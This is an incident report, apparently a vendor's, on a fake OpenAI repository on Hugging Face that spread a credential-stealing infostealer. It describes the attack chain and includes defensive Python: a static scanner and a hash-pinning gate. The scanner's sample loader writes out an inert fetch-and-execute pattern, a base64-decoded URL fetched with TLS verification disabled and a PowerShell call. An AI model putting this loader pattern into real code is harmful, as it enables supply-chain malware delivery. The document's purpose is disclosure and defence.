PERMISSION/PROTOCOL

2026-05-07

HighMedia report

Fake OpenAI repository on Hugging Face reached #1 trending with 244K downloads before delivering credential-stealing infostealer

A typosquatted OpenAI repository on Hugging Face hit 244K downloads and #1 trending before being removed, delivering a Rust-based infostealer that steals browser credentials, Discord tokens, and cryptocurrency wallets.

Platform: Hugging Face (AI model platform)
Category: Credential exposure
Attack type: AI model supply chain attack / typosquatting
Affected: Developer workstations and CI environments that install AI models from Hugging Face

What happened

A malicious repository mimicked OpenAI's Privacy Filter, reached Hugging Face trending, and executed a credential-stealing infostealer on Windows machines that installed the model.

Why it matters

244,000 downloads of confirmed infostealer malware. Stolen data: browser passwords, session tokens, Discord tokens, SSH/FTP/VPN configs, cryptocurrency wallets, and system screenshots exfiltrated to attacker C2. Connected to Mini Shai-Hulud campaign (170+ npm/PyPI packages compromised).

Missing authorization check

A Deploy Gate requiring code integrity verification before executing any downloaded AI model or dependency in a development or CI environment. Model downloads should be treated as untrusted code until verified.

Would PP block it?

PP's Deploy Gate enforces authorization before code reaches production, but it cannot verify the integrity of upstream model artifacts from third-party platforms. The missing controls are Hugging Face-side model signing, developer-side hash verification before execution, and CI policies that prohibit unapproved model sources. PP's dependency tracking features could flag untrusted model sources if integrated upstream.

Incident analysis

Timeline and technical read

Timeline

  1. 2026-05-07: HiddenLayer researchers discover the Open-OSS/privacy-filter malicious repository on Hugging Face.
  2. 2026-05-07: Repository reaches #1 trending on Hugging Face with 244,000 downloads. loader.py executes a multi-stage malware chain on Windows.
  3. 2026-05-07: HiddenLayer reports to Hugging Face. Platform removes the repository.
  4. 2026-05-09: Bleeping Computer publishes coverage. HiddenLayer links the campaign to Mini Shai-Hulud and the npm/PyPI supply chain attack involving 170+ packages.
  5. 2026-05-15: Signal detected in PP scout scan. Connected to the TanStack/OpenAI Codex supply chain incident via Mini Shai-Hulud campaign infrastructure.

Technical breakdown

  • The attack exploited Hugging Face's trending algorithm as a trust signal: #1 trending appeared as social proof of legitimacy, accelerating downloads.
  • The loader.py file included decoy AI-related code to appear harmless while silently fetching an external payload from a base64-encoded URL with SSL certificate verification disabled.
  • Multi-stage execution chain: PowerShell → privilege escalation → Microsoft Defender exclusion → Rust-based infostealer (sefirah) → C2 exfiltration to recargapopular[dot]com.
  • The 244,000 download count may have been artificially inflated; 667 accounts that liked the repo appear auto-generated, suggesting coordinated campaign infrastructure.
  • Overlaps with Mini Shai-Hulud campaign: same infrastructure used in the TanStack npm supply chain attack that breached OpenAI Codex and exposed code-signing certificates.
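The loader pattern described above (a decoy script that decodes a URL at runtime, fetches with TLS verification off, and hands the result to a shell) is the kind of thing a pre-execution review can flag statically. The following is an added example, not code from HiddenLayer, Hugging Face, or Permission Protocol: an AST-based scanner that looks for those three indicators together in a Python loader and returns a verdict. Both input scripts are constructed for the example; the base64 string in the suspicious sample decodes to the reserved placeholder https://example.invalid and is never decoded or fetched here.

```python
import ast

# Constructed sample standing in for a suspicious model-repo loader script.
# It is inert text used only as scanner input; nothing in it is executed.
SAMPLE_LOADER = '''
import base64, requests, subprocess

def load_model(path):
    # decoy "AI" code so the file looks like a normal model loader
    return {"weights": path}

def _init():
    url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=").decode()
    blob = requests.get(url, verify=False).content
    subprocess.run(["powershell", "-Command", "Write-Output placeholder"])
'''

# Constructed benign sample: a loader that only reads a local weights file.
SAMPLE_CLEAN = '''
import json

def load_model(path):
    with open(path) as fh:
        return json.load(fh)
'''

NETWORK_FUNCS = {"get", "post", "urlopen", "urlretrieve"}
EXEC_MODULES = {"subprocess", "os"}
EXEC_FUNCS = {"run", "Popen", "call", "check_output", "system", "popen"}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or '' if the chain is not plain names."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_loader(source):
    """Return the set of indicator names found in a loader script's source text."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        # Indicator 1: a URL or payload assembled from base64 at runtime.
        if name.endswith("b64decode"):
            findings.add("runtime_base64_decode")
        # Indicator 2: an outbound fetch, worse if certificate checks are off.
        if name.split(".")[-1] in NETWORK_FUNCS:
            findings.add("network_fetch")
            for kw in node.keywords:
                if (kw.arg == "verify" and isinstance(kw.value, ast.Constant)
                        and kw.value.value is False):
                    findings.add("tls_verification_disabled")
        # Indicator 3: spawning a process, specifically PowerShell on Windows.
        head, _, tail = name.partition(".")
        if head in EXEC_MODULES and tail in EXEC_FUNCS:
            findings.add("process_execution")
            for arg in node.args:
                for sub in ast.walk(arg):
                    if (isinstance(sub, ast.Constant) and isinstance(sub.value, str)
                            and "powershell" in sub.value.lower()):
                        findings.add("powershell_invocation")
    return findings


def risk_verdict(findings):
    """'block' when fetch and execute both appear, 'review' on partial hits, else 'allow'."""
    if {"network_fetch", "process_execution"} <= findings:
        return "block"
    if findings:
        return "review"
    return "allow"


if __name__ == "__main__":
    for label, src in (("suspicious", SAMPLE_LOADER), ("clean", SAMPLE_CLEAN)):
        hits = scan_loader(src)
        print(label, risk_verdict(hits), sorted(hits))
```

The scanner is deliberately a CI tripwire rather than a malware classifier: a loader that legitimately needs network access will land in "review", and that is the point, since a model artifact should not need to fetch and spawn anything at import time.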

Authorization boundary

Where the authorization boundary should have been

This incident is categorized as Credential exposure. The relevant Permission Protocol gate is Deploy Gate. The assessment is conditional: PP can block the action only where the real action boundary is routed through a gate.

If enforced at: Model download / execution boundary in developer and CI environments
Still needs: Third-party AI model platform integrity; Hugging Face's trending algorithm as an attack surface; Windows execution policy for downloaded Python scripts
Receipt required for: Execution of any downloaded AI model artifact, which must have a verified hash, a known publisher, and an approved source registry
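The receipt conditions above (verified hash, known publisher, approved source) and the "developer-side hash verification before execution" control named under "Would PP block it?" can be expressed as a small local gate that runs before any artifact is loaded. The following is an added example and not Permission Protocol's own code: it pins artifacts by SHA-256, allows only repositories under an approved publisher namespace, and returns a receipt recording the decision. The publisher list, the repo id "openai/privacy-filter-placeholder", and the artifact bytes are constructed placeholders; "Open-OSS/privacy-filter" is the lookalike namespace from the incident.

```python
import hashlib
import os
import tempfile
from dataclasses import dataclass

# Constructed policy for the example: publisher namespaces the team has approved.
APPROVED_PUBLISHERS = {"openai"}


@dataclass
class Receipt:
    repo_id: str
    sha256: str
    decision: str   # "allow" or "deny"
    reason: str


def sha256_file(path):
    """Stream the file so large model artifacts do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def gate_artifact(repo_id, path, approved_publishers, pinned_hashes):
    """Decide whether a downloaded artifact may be executed. This never loads it."""
    publisher = repo_id.split("/", 1)[0].lower()
    digest = sha256_file(path)
    # Check 1: the namespace must be an approved publisher, so a lookalike
    # namespace fails even when its repo name matches the real product.
    if publisher not in approved_publishers:
        return Receipt(repo_id, digest, "deny",
                       f"publisher '{publisher}' is not on the approved list")
    # Check 2: the artifact must be pinned; unknown artifacts are not executed.
    expected = pinned_hashes.get(repo_id)
    if expected is None:
        return Receipt(repo_id, digest, "deny", "no pinned hash for this artifact")
    # Check 3: the bytes on disk must match the pin.
    if digest != expected:
        return Receipt(repo_id, digest, "deny", "hash mismatch with pinned value")
    return Receipt(repo_id, digest, "allow", "publisher approved and hash matches pin")


def demo():
    """Run the gate over constructed artifacts: a pinned one, a tampered copy, a lookalike repo."""
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "privacy_filter.bin")
        with open(good, "wb") as fh:
            fh.write(b"constructed model bytes v1")          # placeholder artifact
        pins = {"openai/privacy-filter-placeholder": sha256_file(good)}

        tampered = os.path.join(tmp, "tampered.bin")
        with open(tampered, "wb") as fh:
            fh.write(b"constructed model bytes v1 + appended loader")

        return {
            "pinned": gate_artifact("openai/privacy-filter-placeholder", good,
                                    APPROVED_PUBLISHERS, pins).decision,
            "tampered": gate_artifact("openai/privacy-filter-placeholder", tampered,
                                      APPROVED_PUBLISHERS, pins).decision,
            "lookalike": gate_artifact("Open-OSS/privacy-filter", good,
                                       APPROVED_PUBLISHERS, pins).decision,
        }


if __name__ == "__main__":
    for case, decision in demo().items():
        print(f"{case}: {decision}")
```

Two practical notes. The pin has to be recorded from a source you trust (a release page or an out-of-band channel), not from the same repository page you are downloading from, or the gate only proves the download was not corrupted in transit. And the bytes you hash must be the bytes you load; hash the file and then load that same path immediately, rather than hashing one copy and executing another.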

PP governs agent tool-call authority within an organization's own systems. It does not govern Hugging Face's platform security or verify the integrity of third-party model downloads. This requires supply-chain controls (code signing, hash verification) outside PP's scope.

Start small

Put the relevant gate at this action boundary.

This incident maps to Deploy Gate. Start with the boundary that controls the actual action, then require a signed receipt before execution.
